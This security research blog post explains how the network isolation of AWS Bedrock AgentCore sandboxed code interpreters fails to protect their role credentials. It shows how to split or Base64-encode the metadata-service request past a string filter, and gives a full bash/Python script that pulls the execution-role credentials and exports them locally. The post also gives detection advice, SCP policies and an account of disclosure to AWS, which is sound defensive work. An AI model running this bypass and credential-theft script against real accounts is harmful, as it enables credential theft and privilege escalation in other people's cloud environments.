
In my first article on Bedrock AgentCore Code Interpreters, I demonstrated that custom code interpreters can be coerced into performing AWS control plane actions by non-agentic identities. This presented a novel path to privilege escalation, whereby any user with access to custom code interpreters could effectively use any privilege assigned to those code interpreters.

The focus of that first article was specifically on the risks of public custom code interpreters in AgentCore – which is to say those code interpreters that had external network access. This was because external network access was needed to reach the AWS control plane endpoints. A minor aside in the article detailed how sandboxed custom code interpreters could still access a subset of AWS services, namely S3.

In this article, we’ll take a closer look at sandboxed code interpreters – demonstrating that isolating the code interpreter using the sandbox network mode is not a sufficient method to protect the interpreter’s role credentials from abuse by a bad actor.

Sandboxed Code Interpreters



There are two network modes for AgentCore Code Interpreters: Sandbox and Public. As per the AWS docs, sandboxed code interpreters provide an execution environment with “complete isolation with no external network access.” Note the operative word: external.

The idea here is that a code interpreter can’t reach the public internet. Any attempts to do so will not resolve correctly.

(For details on how to build a Python function that can pass code to an AgentCore code interpreter, see the Invoking Code Interpreters section of the previous article.)
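For readers without the previous article to hand, such a helper might look roughly like the sketch below. It reuses the `start_code_interpreter_session` and `invoke_code_interpreter` calls that appear in the script later in this article. The function name `run_command` is ours, and the assumption that each stream event carries its output under `result.structuredContent.stdout` is taken from that script rather than verified separately.

```python
def run_command(client, interpreter_id, command):
    """Run one shell command in a new code interpreter session and return its stdout.

    `client` is expected to be a boto3 'bedrock-agentcore' client (or a stub
    exposing the same two methods); it is passed in so the helper stays testable.
    """
    session = client.start_code_interpreter_session(
        codeInterpreterIdentifier=interpreter_id,
    )
    response = client.invoke_code_interpreter(
        codeInterpreterIdentifier=interpreter_id,
        sessionId=session["sessionId"],
        name="executeCommand",
        arguments={"command": command},
    )
    chunks = []
    for event in response["stream"]:
        # Assumed event shape: {'result': {'structuredContent': {'stdout': ...}}}.
        # Events without that shape are skipped rather than raising KeyError.
        stdout = event.get("result", {}).get("structuredContent", {}).get("stdout")
        if stdout:
            chunks.append(stdout)
    return "".join(chunks)


# Usage (requires boto3, AWS credentials, and a real interpreter ID):
#   import boto3
#   client = boto3.client("bedrock-agentcore")
#   print(run_command(client, "<code-interpreter-id>", "curl -sS -m 5 https://example.com"))
```

Passing the client in as a parameter is a design choice for this sketch only; it lets the function be exercised against a stub without touching AWS.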



In their docs, AWS shows how even a sandboxed code interpreter can be used to access S3. A simple AWS CLI command demonstrates that this does work:



The STS endpoint by contrast is not reachable without external network access:

However, the fact that we could access S3 from the sandboxed code interpreter led to a critical realization. Access to storage was achieved not by mounting it to the code interpreter’s execution environment, but through the S3 API. This meant that even in the sandboxed environment, the code interpreter had access to its execution role. If we could locate and extract those role session credentials, then permissions unusable within the code interpreter (due to the inability to access AWS service endpoints) could be used outside the code interpreter using the same role session.

The MicroVM Metadata Service (MMDS)

So, how do we go about locating the role credentials?

It turns out that many compute resources in Bedrock AgentCore (including code interpreters) run on Firecracker MicroVMs – the same tech that powers Lambda and Fargate. MicroVMs can be configured to use the MicroVM Metadata Service, which is available by default at 169.254.169.254 if exposed. This is the same IPv4 address that the EC2 Instance Metadata Service is associated with, and we’ll see that in AgentCore resources, the behaviour of the MMDS is very similar to the EC2 IMDS.

Early Technical Difficulties



First, we had to determine whether MMDS could be accessed at all from a code interpreter with the sandbox network mode. Early attempts at accessing the default MMDS address were not promising…

It wouldn’t make sense for MMDS to be enabled but return a 403 Forbidden response, so the obvious culprit was that the request to the code interpreter was being denied based on the contents (code) of our request. It turns out that we receive a 403 Forbidden response when either of the following strings is present in the provided code:

://169.254.169.254

/latest/meta-data



This isn’t a very powerful barrier. Since we can provide arbitrary shell commands, we can trivially split the MMDS request into pieces which, on their own, don’t trigger the request denial. This actually works, and confirms that MMDS is both enabled and accessible from the sandboxed code interpreter:
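As a rough illustration of the splitting approach, the sketch below assembles a shell command in which the address and path segment live in separate shell variables, then checks that neither filtered string appears in the text that is actually submitted. The variable layout mirrors the command used in the script later in this article; the function name `build_split_request` and the `BLOCKED_SUBSTRINGS` constant are ours and purely illustrative.

```python
# The two substrings observed to trigger a 403 when present in submitted code.
BLOCKED_SUBSTRINGS = ("://169.254.169.254", "/latest/meta-data")


def build_split_request(path=""):
    """Return a shell command that requests an MMDS path without containing a blocked substring."""
    command = (
        'IP="169.254.169.254"; METADATA="meta-data"; '
        "curl -s http://$IP/latest/$METADATA/" + path
    )
    # Guard: fail loudly if the assembled text would still trip the filter.
    for blocked in BLOCKED_SUBSTRINGS:
        if blocked in command:
            raise ValueError(f"command still contains {blocked!r}")
    return command
```

The shell only joins the pieces at execution time inside the interpreter, so a filter that inspects the submitted text never sees the full URL.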

Exfiltrating Credentials



The complete path to the instance role credentials is similar to what it would be in an EC2 instance using IMDS. Specifically, it can be found at http://169.254.169.254/latest/meta-data/iam/security-credentials/execution_role

Splitting this apart to bypass the string filters, we can retrieve the code interpreter’s role session credentials.

It should be noted that there are many other trivial ways to bypass the simple string restrictions. For example, wrapping the curl command in Base64, then decoding and running it from the code interpreter also works.
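The Base64 variant can be sketched in a few lines. This is an illustration rather than the exact command we ran: the function name `wrap_in_base64` is ours, and it assumes the interpreter image provides `base64 -d` and `sh`.

```python
import base64


def wrap_in_base64(command):
    """Wrap a shell command so that only its Base64 encoding appears in the submitted text."""
    encoded = base64.b64encode(command.encode("utf-8")).decode("ascii")
    # The standard Base64 alphabet contains neither ':' nor '-', so the encoded
    # payload cannot contain either of the filtered strings.
    return f"echo {encoded} | base64 -d | sh"
```

The wrapped command is decoded and executed only once it is already inside the interpreter, which is why content-based filtering of the request is not an effective control here.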

Impact

It is fairly easy to hack together a script that starts a code interpreter session, grabs the role credentials from MMDS using a Python helper, and replaces the local AWS credentials with them, effectively assuming the code interpreter’s execution role session.

#!/bin/bash
# Source this script (rather than executing it) so that the exported
# credentials persist in the calling shell.

CODE_INTERPRETER_ID="$1"

# Write a temporary Python helper that runs one shell command in the interpreter.
cat << 'EOF' > "get_secrets_from_interpreter.py"
import boto3
import sys

bedrock_agentcore_client = boto3.client('bedrock-agentcore')
CODE_INTERPRETER_ID = sys.argv[1]

session = bedrock_agentcore_client.start_code_interpreter_session(
    codeInterpreterIdentifier=CODE_INTERPRETER_ID,
)
session_id = session['sessionId']

# The address and path are split into shell variables so that neither
# filtered string appears in the submitted code.
code = 'IP="169.254.169.254"; METADATA="meta-data"; curl -s http://$IP/latest/$METADATA/iam/security-credentials/execution_role'

response = bedrock_agentcore_client.invoke_code_interpreter(
    codeInterpreterIdentifier=CODE_INTERPRETER_ID,
    sessionId=session_id,
    name='executeCommand',
    arguments={'command': code}
)

# Print the command's stdout (the credentials JSON); skip events without it.
for event in response['stream']:
    stdout = event.get('result', {}).get('structuredContent', {}).get('stdout')
    if stdout:
        print(stdout)
EOF

CREDS=$(python3 get_secrets_from_interpreter.py "$CODE_INTERPRETER_ID")

# Replace the local AWS credentials with the interpreter's role session.
export AWS_ACCESS_KEY_ID=$(echo "$CREDS" | jq -r ".AccessKeyId")
export AWS_SECRET_ACCESS_KEY=$(echo "$CREDS" | jq -r ".SecretAccessKey")
export AWS_SESSION_TOKEN=$(echo "$CREDS" | jq -r ".Token")

rm get_secrets_from_interpreter.py





Using this script enables us to use the code interpreter’s role credentials to access AWS control plane endpoints that we otherwise would not have been able to access from the interpreter itself. The example here shows a successful call to the STS endpoint using the interpreter’s role credentials – which was inaccessible within the code interpreter:

It also demonstrates how a role with Bedrock permissions can effectively be used to pivot into another role with greater privileges.
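The same hand-off can be done without environment variables. The sketch below maps the credential document returned by MMDS onto the keyword arguments accepted by `boto3.Session`; the `AccessKeyId`, `SecretAccessKey` and `Token` field names are the ones the script above extracts with `jq`, while the function name `session_kwargs_from_mmds` is ours.

```python
import json


def session_kwargs_from_mmds(document):
    """Convert the MMDS credential JSON into keyword arguments for boto3.Session."""
    data = json.loads(document)
    return {
        "aws_access_key_id": data["AccessKeyId"],
        "aws_secret_access_key": data["SecretAccessKey"],
        "aws_session_token": data["Token"],
    }


# Usage (requires boto3 and a live credential document in `text`):
#   import boto3
#   session = boto3.Session(**session_kwargs_from_mmds(text))
#   print(session.client("sts").get_caller_identity()["Arn"])
```

A successful `get_caller_identity` call made this way runs outside the sandbox, where the STS endpoint is reachable.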

Monitoring Considerations

No Default CloudTrail Logging of Invocations



As mentioned in our previous post – code interpreter invocations are not logged by default in CloudTrail. One needs to enable data events in order to obtain details about which identities are calling which code interpreters.

Tracing Identities After Credential Theft is Hard

Management events performed using the exfiltrated credentials are logged to CloudTrail – but as expected, they’re attributed to the code interpreter’s identity. This can make detection difficult, as a bad actor’s actions may blend with logs of legitimate uses of the code interpreter (e.g. reading or writing from S3).

Defense Recommendations

When Access to AWS Resources is Required, Use Gateways & Lambda

If an agent needs continuous access to other AWS resources, it will often be accessing them in a repeatable or predictable pattern. If this pattern can be implemented as a parameterized Lambda function and invoked by agents using AgentCore Gateways, then AWS control plane access can be limited to only the operations pre-defined in the function code. This puts control over AI-related resources back in the hands of the developers, minimizing the potential for abuse of execution role privilege.

If this recommendation is taken, SCPs can then be used to enforce this pattern by preventing the creation of code interpreters org-wide:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "Action": "bedrock-agentcore:CreateCodeInterpreter",
      "Resource": "*"
    }
  ]
}

Monitor Code Interpreter Creations & Invocations

By enabling Data Events for AgentCore and auditing the InvokeCodeInterpreter event, you can catch attempts to leverage code interpreter privileges by unauthorized individuals.

Monitoring can also be configured for the CreateCodeInterpreter management event, which is logged by default in CloudTrail, to catch attempts to set up code interpreters with wide-ranging permissions that can later be invoked.
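Once data events are flowing, the audit itself can be quite simple. The sketch below is one possible approach, assuming CloudTrail records have already been loaded as Python dictionaries: it flags `InvokeCodeInterpreter` events whose caller is not on an allowlist. The `eventName`, `eventTime`, `userIdentity.arn` and `userIdentity.sessionContext.sessionIssuer.arn` fields are standard CloudTrail record fields; the function names and the allowlist approach are ours.

```python
def principal_arn(record):
    """Return the IAM role behind an assumed-role session, or the caller ARN otherwise."""
    identity = record.get("userIdentity", {})
    issuer = identity.get("sessionContext", {}).get("sessionIssuer", {})
    # For assumed roles, the session issuer is the underlying IAM role ARN,
    # which is easier to allowlist than a per-session ARN.
    return issuer.get("arn") or identity.get("arn")


def unexpected_invocations(records, allowed_principal_arns):
    """List (eventTime, principal) pairs for invocations by principals not on the allowlist."""
    allowed = set(allowed_principal_arns)
    return [
        (record.get("eventTime"), principal_arn(record))
        for record in records
        if record.get("eventName") == "InvokeCodeInterpreter"
        and principal_arn(record) not in allowed
    ]
```

In practice the allowlist would contain the agent runtime roles that are expected to call each interpreter; anything else is worth a closer look.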

Where Code Interpreters are Required, Restrict Access

While “do least privilege right” is often less than helpful advice to give to cloud developers, code interpreters with execution roles will likely only be needed by a small subset of AI workloads. If these workloads can be identified as development is occurring, SCPs can be used to restrict access to code interpreters – ensuring that only the required agent runtimes are able to access the interpreter at all. There shouldn’t be any need for non-agentic identities to be invoking code interpreters outside of testing.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "Action": "bedrock-agentcore:InvokeCodeInterpreter",
      "Resource": "<code-interpreter-arn>",
      "Condition": {
        "ArnNotEquals": {
          "aws:PrincipalArn": "<allowed-agent-identity-arn>"
        }
      }
    }
  ]
}

And why do we suggest using SCPs rather than resource policies? The answer is rather simple – resource policies are not supported for any Bedrock AgentCore resources at this time.
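Where several agent identities legitimately need the same interpreter, the restrictive SCP in this section can be generated rather than hand-edited. The sketch below is a minimal example with a hypothetical function name, `build_invoke_scp`; it relies on the fact that a negated condition operator such as `ArnNotEquals` with multiple values only matches when the principal equals none of them.

```python
import json


def build_invoke_scp(code_interpreter_arn, allowed_principal_arns):
    """Build an SCP that denies InvokeCodeInterpreter to every principal not listed."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Deny",
                "Action": "bedrock-agentcore:InvokeCodeInterpreter",
                "Resource": code_interpreter_arn,
                "Condition": {
                    "ArnNotEquals": {
                        # Sorted for stable output; the deny applies only when
                        # the caller matches none of these ARNs.
                        "aws:PrincipalArn": sorted(allowed_principal_arns)
                    }
                },
            }
        ],
    }


# Usage: print(json.dumps(build_invoke_scp("<code-interpreter-arn>", ["<allowed-agent-identity-arn>"]), indent=2))
```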

Disclosure & AWS Response

As credential exfiltration from sandboxed code interpreters could result in bad actors leveraging execution role privileges not usable from inside the code interpreter – the MMDS string filter bypass was reported to AWS through their Vulnerability Disclosure Program.

AWS confirmed that successful access to MMDS was still in the range of expected behaviour of the service, and that as per the shared responsibility model, customers are responsible for properly configuring execution roles and ensuring that code interpreter sessions are not granted excessive privileges.

Even so, in light of our report, AWS has taken steps to make best practices regarding AgentCore execution roles clearer, publishing a new landing page in the Amazon Bedrock AgentCore Developer Guide. This page – Understanding Credentials Management in Amazon Bedrock AgentCore – aims to make clear the impact of the exposed MMDS endpoints even in sandboxed environments that have no other network connectivity.

Conclusion

While sandboxed custom code interpreters appear to prevent some AWS control plane access by isolating the execution environment from external network access, the privilege assigned to those code interpreters is still very real.

The infrastructure supporting these execution environments still exposes privilege by design, and with an understanding of how the interpreters obtain their credentials at runtime, it is trivial to exfiltrate them. Sandboxed code interpreters are no safer than public ones when it comes to abuse by non-agentic identities.